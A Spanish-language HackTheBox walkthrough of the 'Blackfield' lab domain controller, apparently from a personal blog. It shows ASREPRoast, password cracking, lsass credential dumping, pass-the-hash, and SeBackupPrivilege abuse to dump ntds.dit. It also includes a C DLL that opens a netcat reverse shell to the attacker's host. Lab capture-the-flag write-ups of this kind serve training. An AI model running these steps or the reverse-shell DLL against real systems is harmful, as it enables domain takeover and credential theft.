xchg2pwn

xchg2pwn

Entusiasta del reversing y desarrollo de exploits


Contenido


HackTheBox

Blackfield



Enumeración


Iniciamos la máquina escaneando los puertos de la máquina con nmap donde encontramos varios puertos abiertos, en Windows es recomendable usar el parametro -Pn para forzar el escaneo aunque no reciba respuesta de los paquetes ping

❯ nmap 10.10.10.192 -Pn
Nmap scan report for 10.10.10.192
PORT     STATE SERVICE
53/tcp   open  domain
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
389/tcp  open  ldap
445/tcp  open  microsoft-ds
593/tcp  open  http-rpc-epmap
3268/tcp open  globalcatLDAP
5985/tcp open  wsman

Con crackmapexec podemos obtener información de la maquina asi como el dominio que es blackfield.local ademas del nombre que parece es DC01

❯ crackmapexec smb 10.10.10.192
SMB         10.10.10.192     445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)

Para posibles proximos ataques o solo por comodidad agregaremos el dominio al /etc/hosts ademas el nombre de la máquina que es el DC como otro dominio

❯ echo "10.10.10.192 blackfield.local dc01.blackfield.local" | sudo tee -a /etc/hosts

Enumerando los recursos compartidos a nivel de SMB como el usuario null sin contraseña vemos que tenemos privilegio de lectura al recurso profiles$

❯ crackmapexec smb blackfield.local -u null -p '' --shares
SMB         blackfield.local 445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)  
SMB         blackfield.local 445    DC01             [+] BLACKFIELD.local\null: 
SMB         blackfield.local 445    DC01             [+] Enumerated shares
SMB         blackfield.local 445    DC01             Share           Permissions     Remark
SMB         blackfield.local 445    DC01             -----           -----------     ------
SMB         blackfield.local 445    DC01             ADMIN$                          Remote Admin
SMB         blackfield.local 445    DC01             C$                              Default share
SMB         blackfield.local 445    DC01             forensic                        Forensic / Audit share.
SMB         blackfield.local 445    DC01             IPC$            READ            Remote IPC
SMB         blackfield.local 445    DC01             NETLOGON                        Logon server share 
SMB         blackfield.local 445    DC01             profiles$       READ            
SMB         blackfield.local 445    DC01             SYSVOL                          Logon server share

Al conectarnos al recurso profiles$ con smbclient como el usuario null sin contraseña nos encontramos con carpetas con nombres de posibles usuarios

❯ impacket-smbclient blackfield.local/null@dc01.blackfield.local -no-pass  
Impacket v0.11.0 - Copyright 2023 Fortra

Type help for list of commands
# use profiles$
# ls
drw-rw-rw-          0  Wed Jun  3 12:47:12 2020 .
drw-rw-rw-          0  Wed Jun  3 12:47:12 2020 ..
drw-rw-rw-          0  Wed Jun  3 12:47:11 2020 AAlleni
drw-rw-rw-          0  Wed Jun  3 12:47:11 2020 ABarteski
drw-rw-rw-          0  Wed Jun  3 12:47:11 2020 ABekesz
drw-rw-rw-          0  Wed Jun  3 12:47:11 2020 ABenzies
drw-rw-rw-          0  Wed Jun  3 12:47:11 2020 ABiemiller
drw-rw-rw-          0  Wed Jun  3 12:47:11 2020 AChampken
drw-rw-rw-          0  Wed Jun  3 12:47:11 2020 ACheretei
drw-rw-rw-          0  Wed Jun  3 12:47:11 2020 ACsonaki
drw-rw-rw-          0  Wed Jun  3 12:47:11 2020 AHigchens
drw-rw-rw-          0  Wed Jun  3 12:47:11 2020 AJaquemai
drw-rw-rw-          0  Wed Jun  3 12:47:11 2020 AKlado
drw-rw-rw-          0  Wed Jun  3 12:47:11 2020 AKoffenburger
drw-rw-rw-          0  Wed Jun  3 12:47:11 2020 AKollolli
.............................................................

Creamos un archivo llamado users.txt con el nombre de las carpetas y usando kerbrute enumeramos los usuarios validos en el dominio, encontramos 3 validos

❯ kerbrute userenum -d blackfield.local --dc dc01.blackfield.local users.txt  
    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/ 

>  Using KDC(s):
>  	dc01.blackfield.local:88

>  [+] VALID USERNAME:	 audit2020@blackfield.local
>  [+] VALID USERNAME:	 support@blackfield.local
>  [+] VALID USERNAME:	 svc_backup@blackfield.local
>  Done! Tested 314 usernames (3 valid) in 69.595 seconds


Access - support


Nuestra lista de usuarios se disminuye a solo 3, al probar un ataque ASREPRoast con estos usuarios el usuario support es vulnerable y nos devuelve su hash

❯ impacket-GetNPUsers blackfield.local/ -no-pass -usersfile users.txt
Impacket v0.11.0 - Copyright 2023 Fortra

[-] User audit2020 doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$support@BLACKFIELD.LOCAL:31cc48516cee02ea98a1780c9bf418d2$d70ab79d141aa18456ad2583b8543b59101746b09d24b880912a5b7d77826c52191f18e4da324f9aaeac6844354f0bf0a742ebcece882906df64969eb81ad99e45e081f8139d66e106cfe39d98fe2dfe50661306236747e68405d3dc89a4f2ff325de3aa135208a92cbb998362c8f0eb8acd4b14a09cd0dcab789ec5971eca7656a05b8f6727dc42a7ddaa172a629a2de268ace291a795d72c4bdec0cb796a01a101f45c8379094e21af188fa526d35481df3e4e11564cbd0c9b8afe4428bb99e73c3f8b39dc7799386032a7584a06afff1f6eedc97eb035fc2605e70e76f67f07c7cc5b57182254e5f4578b2c79c2b370634493  
[-] User svc_backup doesn't have UF_DONT_REQUIRE_PREAUTH set

Con john podemos crackear este hash y obtener la contraseña del usuario support

❯ john -w:/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 XOP 4x2])  
Press 'q' or Ctrl-C to abort, almost any other key for status
#00^BlackKnight  ($krb5asrep$23$support@BLACKFIELD.LOCAL)
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Comprobamos con crackmapexec las credenciales y son validas sin embargo realmente no nos aporta nuevos privilegios sobre los recursos smb compartidos

❯ crackmapexec smb blackfield.local -u support -p '#00^BlackKnight'
SMB         blackfield.local 445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)  
SMB         blackfield.local 445    DC01             [+] BLACKFIELD.local\support:#00^BlackKnight 

❯ crackmapexec smb blackfield.local -u support -p '#00^BlackKnight' --shares
SMB         blackfield.local 445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)  
SMB         blackfield.local 445    DC01             [+] BLACKFIELD.local\support:#00^BlackKnight 
SMB         blackfield.local 445    DC01             [+] Enumerated shares
SMB         blackfield.local 445    DC01             Share           Permissions     Remark
SMB         blackfield.local 445    DC01             -----           -----------     ------
SMB         blackfield.local 445    DC01             ADMIN$                          Remote Admin
SMB         blackfield.local 445    DC01             C$                              Default share
SMB         blackfield.local 445    DC01             forensic                        Forensic / Audit share.
SMB         blackfield.local 445    DC01             IPC$            READ            Remote IPC
SMB         blackfield.local 445    DC01             NETLOGON        READ            Logon server share 
SMB         blackfield.local 445    DC01             profiles$       READ            
SMB         blackfield.local 445    DC01             SYSVOL          READ            Logon server share


Access - audit2020


Podemos bloodhound para recolectar toda la información del dominio, para esto usaremos las credenciales del usuario support y crear un archivo zip con ella

❯ bloodhound-python -u support -p '#00^BlackKnight' -c All -d blackfield.local -dc dc01.blackfield.local -ns 10.10.10.192 --zip  
INFO: Found AD domain: blackfield.local
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.blackfield.local
INFO: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 18 computers
INFO: Connecting to LDAP server: dc01.blackfield.local
INFO: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 316 users
INFO: Found 52 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.BLACKFIELD.local
INFO: Done in 00M 34S
INFO: Compressing output into 20230625195626_bloodhound.zip

Subimos el zip y entre los controles de objetos que tiene el usuario support nos encontramos con el privilegio ForceChangePassword sobre el usuario audit2020

Este privilegio nos permite cambiar la contraseña de un usuario, asi que usando net mediante rpc cambiamos la contraseña del usuario audit2020 por otra

❯ net rpc password audit2020 -U 'blackfield.local/support%#00^BlackKnight' -S dc01.blackfield.local  
Enter new password for audit2020: password123#

Ahora podemos comprobar con crackmapexec que se ha cambiado la contraseña

❯ crackmapexec smb blackfield.local -u audit2020 -p password123#
SMB         blackfield.local 445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)  
SMB         blackfield.local 445    DC01             [+] BLACKFIELD.local\audit2020:password123#


Shell - svc_backup


Al listar los recursos compartidos como el usuario audit2020 ahora tenemos nuevos privilegios, como el de lectura sobre el recurso forensic que antes no teniamos

❯ crackmapexec smb blackfield.local -u audit2020 -p password123# --shares
SMB         blackfield.local 445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)  
SMB         blackfield.local 445    DC01             [+] BLACKFIELD.local\audit2020:password123# 
SMB         blackfield.local 445    DC01             [+] Enumerated shares
SMB         blackfield.local 445    DC01             Share           Permissions     Remark
SMB         blackfield.local 445    DC01             -----           -----------     ------
SMB         blackfield.local 445    DC01             ADMIN$                          Remote Admin
SMB         blackfield.local 445    DC01             C$                              Default share
SMB         blackfield.local 445    DC01             forensic        READ            Forensic / Audit share.
SMB         blackfield.local 445    DC01             IPC$            READ            Remote IPC
SMB         blackfield.local 445    DC01             NETLOGON        READ            Logon server share 
SMB         blackfield.local 445    DC01             profiles$       READ            
SMB         blackfield.local 445    DC01             SYSVOL          READ            Logon server share

Nos conectamos con smbclient con las credenciales de audit2020, en el recurso forensic encontramos 3 directorios con archivos dentro de cada uno de ellos

❯ impacket-smbclient blackfield.local/audit2020:password123#@dc01.blackfield.local  
Impacket v0.11.0 - Copyright 2023 Fortra

Type help for list of commands
# use forensic
# ls
drw-rw-rw-          0  Sun Feb 23 10:10:16 2020 .
drw-rw-rw-          0  Sun Feb 23 10:10:16 2020 ..
drw-rw-rw-          0  Sun Feb 23 13:14:37 2020 commands_output
drw-rw-rw-          0  Thu May 28 16:29:24 2020 memory_analysis
drw-rw-rw-          0  Fri Feb 28 17:30:34 2020 tools
#

Para facilitar el analisis haremos una montura en el directorio /mnt de todos los archivos del recurso forencic, estro proporcionando las credenciales de audit2020

❯ sudo mount -t cifs //blackfield.local/forensic /mnt -o username=audit2020,password=password123#,domain=blackfield.local

En el directorio /mnt podemos listar todos los archivos del recurso forensic, encontramos archivos txt, zip y algunas carpetas con diferentes herramientas

/mnt ❯ ls -l *

commands_output:
.rwxr-xr-x root root 528 B  Sun Feb 23 08:00:19 2020  domain_admins.txt
.rwxr-xr-x root root 962 B  Sun Feb 23 07:51:52 2020  domain_groups.txt
.rwxr-xr-x root root  16 KB Fri Feb 28 17:32:17 2020  domain_users.txt
.rwxr-xr-x root root 506 KB Sun Feb 23 07:53:58 2020  firewall_rules.txt  
.rwxr-xr-x root root 1.7 KB Sun Feb 23 07:50:28 2020  ipconfig.txt
.rwxr-xr-x root root 3.8 KB Sun Feb 23 07:51:01 2020  netstat.txt
.rwxr-xr-x root root 3.9 KB Sun Feb 23 07:53:01 2020  route.txt
.rwxr-xr-x root root 4.4 KB Sun Feb 23 07:56:59 2020  systeminfo.txt
.rwxr-xr-x root root 9.8 KB Sun Feb 23 07:54:29 2020  tasklist.txt

memory_analysis:
.rwxr-xr-x root root  36 MB Thu May 28 16:25:36 2020  conhost.zip
.rwxr-xr-x root root  24 MB Thu May 28 16:25:45 2020  ctfmon.zip
.rwxr-xr-x root root  23 MB Thu May 28 16:25:54 2020  dfsrs.zip
.rwxr-xr-x root root  18 MB Thu May 28 16:26:04 2020  dllhost.zip
.rwxr-xr-x root root 8.4 MB Thu May 28 16:26:13 2020  ismserv.zip
.rwxr-xr-x root root  40 MB Thu May 28 16:25:08 2020  lsass.zip
.rwxr-xr-x root root  61 MB Thu May 28 16:25:25 2020  mmc.zip
.rwxr-xr-x root root  13 MB Thu May 28 16:26:24 2020  RuntimeBroker.zip
.rwxr-xr-x root root 126 MB Thu May 28 16:26:49 2020  ServerManager.zip
.rwxr-xr-x root root  32 MB Thu May 28 16:27:00 2020  sihost.zip
.rwxr-xr-x root root  32 MB Thu May 28 16:27:11 2020  smartscreen.zip
.rwxr-xr-x root root  14 MB Thu May 28 16:27:19 2020  svchost.zip
.rwxr-xr-x root root  33 MB Thu May 28 16:27:30 2020  taskhostw.zip
.rwxr-xr-x root root  14 MB Thu May 28 16:27:38 2020  winlogon.zip
.rwxr-xr-x root root 3.9 MB Thu May 28 16:27:44 2020  wlms.zip
.rwxr-xr-x root root  18 MB Thu May 28 16:27:53 2020  WmiPrvSE.zip

tools:
drwxr-xr-x root root 0 B Sun Feb 23 08:39:03 2020  sleuthkit-4.8.0-win32  
drwxr-xr-x root root 0 B Sun Feb 23 08:35:25 2020  sysinternals
drwxr-xr-x root root 0 B Sun Feb 23 08:35:39 2020  volatility

Los archivos txt dentro de commands_output son la salida de diferentes comandos, por ejemplo domain_admins.txt es del comando net group 'Domain Admins'

/mnt/commands_output ❯ cat domain_admins.txt 
Group name     Domain Admins
Comment        Designated administrators of the domain

Members

--------------------------------------------------------------------------  
Administrator       Ipwn3dYourCompany     
The command completed successfully.

De los archivos zip dentro de memory_analysis parece interesante lsass.zip, este podemos copiarlo de la montura o conectarnos con smbclient y descargarlo

/mnt/memory_analysis ❯ cp lsass.zip /home/kali  


❯ impacket-smbclient blackfield.local/audit2020:password123#@dc01.blackfield.local  
Impacket v0.11.0 - Copyright 2023 Fortra

Type help for list of commands
# use forensic
# cd memory_analysis
# get lsass.zip
#

Este zip contiene dentro un archivo lsass.DMP que es un minidump de lsass

❯ unzip lsass.zip
Archive:  lsass.zip
  inflating: lsass.DMP

Podemos usar mimikatz en Windows para dumpear logonPasswords del minidump

Al dumpear los logons encontramos varias credenciales, entre ellas las de svc_backup, esta autenticación nos muestra su hash NTLM en el dominio

mimikatz # sekurlsa::minidump lsass.DMP
Switch to MINIDUMP : 'lsass.DMP'

mimikatz # sekurlsa::logonPasswords
Opening : 'lsass.DMP' file for minidump...

Authentication Id : 0 ; 406458 (00000000:000633ba)
Session           : Interactive from 2
User Name         : svc_backup
Domain            : BLACKFIELD
Logon Server      : DC01
Logon Time        : 23/02/2020 12:00:03 p. m.
SID               : S-1-5-21-4194615774-2175524697-3563712290-1413
        msv :
         [00000003] Primary
         * Username : svc_backup
         * Domain   : BLACKFIELD
         * NTLM     : 9658d1d1dcd9250115e2205d9f48400d
         * SHA1     : 463c13a9a31fc3252c68ba0a44f0221626a33e5c
         * DPAPI    : a03cd8e9d30171f3cfe8caad92fef621
        tspkg :
        wdigest :
         * Username : svc_backup
         * Domain   : BLACKFIELD
         * Password : (null)
        kerberos :
         * Username : svc_backup
         * Domain   : BLACKFIELD.LOCAL
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 365835 (00000000:0005950b)
.................................................................

Si quisieramos hacerlo desde Linux podemos usar pypykatz pasandole el archivo de minidump, de la misma forma nos extrae las autenticaciones y el hash NTLM

❯ pypykatz lsa minidump lsass.DMP
INFO:pypykatz:Parsing file lsass.DMP
FILE: ======== lsass.DMP =======
== LogonSession ==
authentication_id 406458 (633ba)
session_id 2
username svc_backup
domainname BLACKFIELD
logon_server DC01
logon_time 2020-02-23T18:00:03.423728+00:00
sid S-1-5-21-4194615774-2175524697-3563712290-1413
luid 406458
	== MSV ==
		Username: svc_backup
		Domain: BLACKFIELD
		LM: NA
		NT: 9658d1d1dcd9250115e2205d9f48400d
		SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c
		DPAPI: a03cd8e9d30171f3cfe8caad92fef621
	== WDIGEST [633ba]==
		username svc_backup
		domainname BLACKFIELD
		password None
		password (hex)
	== Kerberos ==
		Username: svc_backup
		Domain: BLACKFIELD.LOCAL
	== WDIGEST [633ba]==
		username svc_backup
		domainname BLACKFIELD
		password None
		password (hex)

== LogonSession ==
authentication_id 365835 (5950b)
...............................................................

Comprobando el hash NT del usuario svc_backup con crackmapexec podemos ver que es valido a nivel de dominio tanto en el protocolo SMB como en winrm

❯ crackmapexec smb blackfield.local -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d
SMB         blackfield.local 445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)  
SMB         blackfield.local 445    DC01             [+] BLACKFIELD.local\svc_backup:9658d1d1dcd9250115e2205d9f48400d

❯ crackmapexec winrm blackfield.local -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d
SMB         blackfield.local 5985   DC01             [*] Windows 10.0 Build 17763 (name:DC01) (domain:BLACKFIELD.local)
HTTP        blackfield.local 5985   DC01             [*] http://blackfield.local:5985/wsman
WINRM       blackfield.local 5985   DC01             [+] BLACKFIELD.local\svc_backup:9658d1d1dcd9250115e2205d9f48400d (Pwn3d!)

Al ser valido para winrm podemos conectarnos haciendo uso de evil-winrm con un passthehash, obtenemos una shell como svc_backup y podemos ver la flag

❯ evil-winrm -i blackfield.local -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d  
PS C:\Users\svc_backup\Documents> whoami
blackfield\svc_backup
PS C:\Users\svc_backup\Documents> type ..\Desktop\user.txt
392**************************543
PS C:\Users\svc_backup\Documents>


Shell - Administrator


Mirando los privilegios del usuario svc_backup encontramos SeBackupPrivilege, la explitación de este privilegio es exactamente igual que en el endgame XEN

PS C:\Users\svc_backup\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======  
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

PS C:\Users\svc_backup\Documents>

Iniciamos creando un txt con los comandos que ejecutara diskshadow, en este caso creamos un alias llamado xyz para la unidad C: y lo exponemos en la X:

❯ cat cmd.txt
set context persistent nowriters 
add volume C: alias xyz 
set metadata C:\ProgramData\xyz.cab 
create 
expose %xyz% X:

Haciendo uso de la función upload de evil-winrm podemos subir este archivo txt

PS C:\ProgramData> upload cmd.txt

Info: Uploading cmd.txt to C:\ProgramData\cmd.txt  

Data: 160 bytes of 160 bytes copied

Info: Upload successful!

PS C:\ProgramData>

Ahora con diskshadow indicamos con el parametro /s el archivo txt con los comandos, al ejecutarlos creara la copia shadow y podremos acceder desde X:

PS C:\ProgramData> diskshadow /s cmd.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer:  DC01,  6/25/2023 10:38:14 PM

-> set context persistent nowriters
-> add volume C: alias xyz
-> set metadata C:\ProgramData\xyz.cab
-> create
Alias xyz for shadow ID {51decf05-558f-4eed-8412-a92b47a180e1} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {4180af0d-16d3-408f-9ae5-459f2ad86d1a} set as environment variable.  

Querying all shadow copies with the shadow copy set ID {4180af0d-16d3-408f-9ae5-459f2ad86d1a}

	* Shadow copy ID = {51decf05-558f-4eed-8412-a92b47a180e1}		%xyz%
		- Shadow copy set: {4180af0d-16d3-408f-9ae5-459f2ad86d1a}	%VSS_SHADOW_SET%
		- Original count of shadow copies = 1
		- Original volume name: \\?\Volume{6cd5140b-0000-0000-0000-602200000000}\ [C:\]
		- Creation time: 6/25/2023 10:38:15 PM
		- Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
		- Originating machine: DC01.BLACKFIELD.local
		- Service machine: DC01.BLACKFIELD.local
		- Not exposed
		- Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
		- Attributes:  No_Auto_Release Persistent No_Writers Differential

Number of shadow copies listed: 1
-> expose %xyz% X:
-> %xyz% = {51decf05-558f-4eed-8412-a92b47a180e1}
The shadow copy was successfully exposed as X:\.
->
PS C:\ProgramData>

Con la función upload incluida en evil-winrm podemos subir un par de dlls que nos ayudaran a explotar este privilegio, después los importamos como modulos

PS C:\ProgramData> upload SeBackupPrivilegeUtils.dll

Info: Uploading SeBackupPrivilegeUtils.dll to C:\ProgramData\SeBackupPrivilegeUtils.dll  

Data: 21844 bytes of 21844 bytes copied

Info: Upload successful!

PS C:\ProgramData> upload SeBackupPrivilegeCmdLets.dll

Info: Uploading SeBackupPrivilegeCmdLets.dll to C:\ProgramData\SeBackupPrivilegeCmdLets.dll  

Data: 16384 bytes of 16384 bytes copied

Info: Upload successful!

PS C:\ProgramData> Import-Module .\SeBackupPrivilegeUtils.dll
PS C:\ProgramData> Import-Module .\SeBackupPrivilegeCmdLets.dll
PS C:\ProgramData>

Ahora copiamos los archivos ntds.dit que contiene los hashes de todos los usuarios del dominio y SYSTEM de la copia creada accediendo desde la unidad X:

PS C:\ProgramData> Copy-FileSeBackupPrivilege X:\Windows\NTDS\ntds.dit ntds.dit
PS C:\ProgramData> Copy-FileSeBackupPrivilege X:\Windows\System32\Config\SYSTEM SYSTEM  
PS C:\ProgramData>

Podemos conectarnos con smbclient de impacket y usando el recurso C$, entrar a la carpeta ProgramData donde tenemos nuestros archivos y descargarlos con get

❯ impacket-smbclient blackfield.local/svc_backup@dc01.blackfield.local -hashes :9658d1d1dcd9250115e2205d9f48400d  
Impacket v0.11.0 - Copyright 2023 Fortra

Type help for list of commands
# use C$
# cd ProgramData
# get ntds.dit
# get SYSTEM
#

Ahora en local con la herramienta secretsdump de impacket, le pasamos el SYSTEM y el ntds.dit que hemos descargado dumpeamos todos los hashes del dominio

❯ impacket-secretsdump LOCAL -system SYSTEM -ntds ntds.dit
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 35640a3fd5111b93cc50e3b4e255ff8c
[*] Reading and decrypting hashes from ntds.dit 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:7f82cc4be7ee6ca0b417c0719479dbec:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3c02561bba6ee4ad6cfd024ec8fda5d:::
audit2020:1103:aad3b435b51404eeaad3b435b51404ee:600a406c2c1f2062eb9bb227bad654aa:::
support:1104:aad3b435b51404eeaad3b435b51404ee:cead107bf11ebc28b3e6e90cde6de212:::
BLACKFIELD.local\BLACKFIELD764430:1105:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
BLACKFIELD.local\BLACKFIELD538365:1106:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
BLACKFIELD.local\BLACKFIELD189208:1107:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
BLACKFIELD.local\BLACKFIELD404458:1108:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
...........................................................................................................

Al comprobar el hash NT de Administrator con crackmapexec devuelve Pwn3d!

❯ crackmapexec smb blackfield.local -u Administrator -H 184fb5e5178480be64824d4cd53b99ee
SMB         blackfield.local 445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)  
SMB         blackfield.local 445    DC01             [+] BLACKFIELD.local\Administrator:184fb5e5178480be64824d4cd53b99ee (Pwn3d!)

Ya que es valido nos podemos simplemente conectar con el hash NT haciendo uso de evil-winrm para obtener una shell como Administrator y poder leer la flag

❯ evil-winrm -i blackfield.local -u Administrator -H 184fb5e5178480be64824d4cd53b99ee  
PS C:\Users\Administrator\Documents> whoami
blackfield\administrator
PS C:\Users\Administrator\Documents> type ..\Desktop\root.txt
437**************************5cb
PS C:\Users\Administrator\Documents>


Extra 1 - Administrator


Si miramos en bloodhound los grupos a los que pertenece svc_backup lo mas interesante que encontramos es el grupo a nivel de dominio Backup Operators

Hay diferentes formas de explotarlo, iniciaremos subiendo el tipico netcat.exe

PS C:\Users\svc_backup\Documents> upload netcat.exe C:\ProgramData  

Info: Uploading netcat.exe to C:\ProgramData\netcat.exe

Data: 60360 bytes of 60360 bytes copied

Info: Upload successful!

PS C:\Users\svc_backup\Documents>

Ahora mediante un programa en C podemos hacer que como proceso ejecute con WinExec el netcat.exe que subimos para asi enviarnos una shell a nuestro host

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

int pwn() {
    WinExec("C:\\Windows\\System32\\cmd.exe /c C:\\ProgramData\\netcat.exe 10.10.14.10 443 -e powershell", 0);  
    return 0;
}

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
    switch (ul_reason_for_call) {
        case DLL_PROCESS_ATTACH:
            pwn();
        case DLL_THREAD_ATTACH:
        case DLL_THREAD_DETACH:
        case DLL_PROCESS_DETACH:
            break;
    }

    return TRUE;
}

Usando x86_64-w64-mingw32-gcc podemos compilar el C como un archivo dll

❯ x86_64-w64-mingw32-gcc code.c -shared -o WindowsCoreDeviceInfo.dll

Creamos un directorio dll y dentro de el subimos el dll malicioso que creamos

PS C:\Users\svc_backup\Documents> mkdir dll

    Directory: C:\Users\svc_backup\Documents

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        6/27/2023   4:40 AM                dll

PS C:\Users\svc_backup\Documents> upload WindowsCoreDeviceInfo.dll dll

Info: Uploading WindowsCoreDeviceInfo.dll to C:\Users\svc_backup\Documents\dll\WindowsCoreDeviceInfo.dll  

Data: 114012 bytes of 114012 bytes copied

Info: Upload successful!

PS C:\Users\svc_backup\Documents>

Usando robocopy podremos aprovechar los privilegios y copiar los archivos dll dentro del directorio dll a el directorio C:\Windows\System32 con el resto de dlls

PS C:\Users\svc_backup\Documents> robocopy /b dll C:\Windows\System32

-------------------------------------------------------------------------------  
   ROBOCOPY     ::     Robust File Copy for Windows
-------------------------------------------------------------------------------  

  Started : Monday, June 26, 2023 12:32:20 AM
   Source : C:\Users\svc_backup\Documents\dll\
     Dest : C:\Windows\System32\

    Files : *.*

  Options : *.* /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30

------------------------------------------------------------------------------

	                   1	C:\Users\svc_backup\Documents\dll\
	*EXTRA Dir        -1	C:\Windows\System32\0409\
	*EXTRA Dir        -1	C:\Windows\System32\ADDSDeployment_Internal\
	*EXTRA Dir        -1	C:\Windows\System32\adprep\
..............................................................................
	  *EXTRA File 		  143360	xwtpw32.dll
	  *EXTRA File 		   79872	zipcontainer.dll
	  *EXTRA File 		  429568	zipfldr.dll
	  *EXTRA File 		   30720	ztrace_maps.dll
	    New File  		   85511	WindowsCoreDeviceInfo.dll
  0%
 76%
100%

------------------------------------------------------------------------------

               Total    Copied   Skipped  Mismatch    FAILED    Extras
    Dirs :         1         0         1         0         0       127
   Files :         1         1         0         0         0      3969
   Bytes :    83.5 k    83.5 k         0         0         0   1.734 g
   Times :   0:00:08   0:00:00                       0:00:00   0:00:08
   Ended : Monday, June 26, 2023 12:32:28 AM

PS C:\Users\svc_backup\Documents>

También subiremos UsoDllLoader para poder cargar los dlls incluido el nuestro

PS C:\Users\svc_backup\Documents> upload UsoDllLoader.exe

Info: Uploading UsoDllLoader.exe to C:\Users\svc_backup\Documents\UsoDllLoader.exe  

Data: 192512 bytes of 192512 bytes copied

Info: Upload successful!

PS C:\Users\svc_backup\Documents>

Al ejecutar el exe este carga los dlls y aunque nos da multiples errores podemos omitirlos ya que es porque realmente este no es el uso para el que fue diseñado

PS C:\Users\svc_backup\Documents> .\UsoDllLoader.exe
[*] Using UpdateOrchestrator->StartScan()
    |__ Creating instance of 'UpdateSessionOrchestrator'... Done.  
    |__ Creating a new Update Session... Done.
    |__ Calling 'StartScan'... Done.
[-] Unable to connect to server!
[*] Retrying with UpdateOrchestrator->StartInteractiveScan()
    |__ Creating instance of 'UpdateSessionOrchestrator'... Done.  
    |__ Creating a new Update Session... Done.
    |__ Calling 'StartInteractiveScan'... Done.
[-] Unable to connect to server!
[*] Retrying with UpdateOrchestrator->StartDownload()
    |__ Creating instance of 'UpdateSessionOrchestrator'... Done.  
    |__ Creating a new Update Session... Done.
    |__ Calling 'StartInteractiveScan'... Done.
[-] Unable to connect to server!
[-] Exploit failed.
PS C:\Users\svc_backup\Documents>

Al cargar el dll malicioso este ejecutara el netcat.exe y nos enviara una powershell como nt authority\system que tiene privilegios maximos sobre DC01

❯ sudo netcat -lvnp 443
Listening on 0.0.0.0 443
Connection received on 10.10.10.192 
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.  

PS C:\Windows\system32> whoami
nt authority\system
PS C:\Windows\system32>


Extra 2 - Administrator


Otra forma es a través de reg, pero antes iniciaremos un servicio smb para poder recibir todos los archivos a los que haremos un backup como lo es la SAM

❯ impacket-smbserver kali . -smb2support
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0  
[*] Config file parsed
[*] Config file parsed
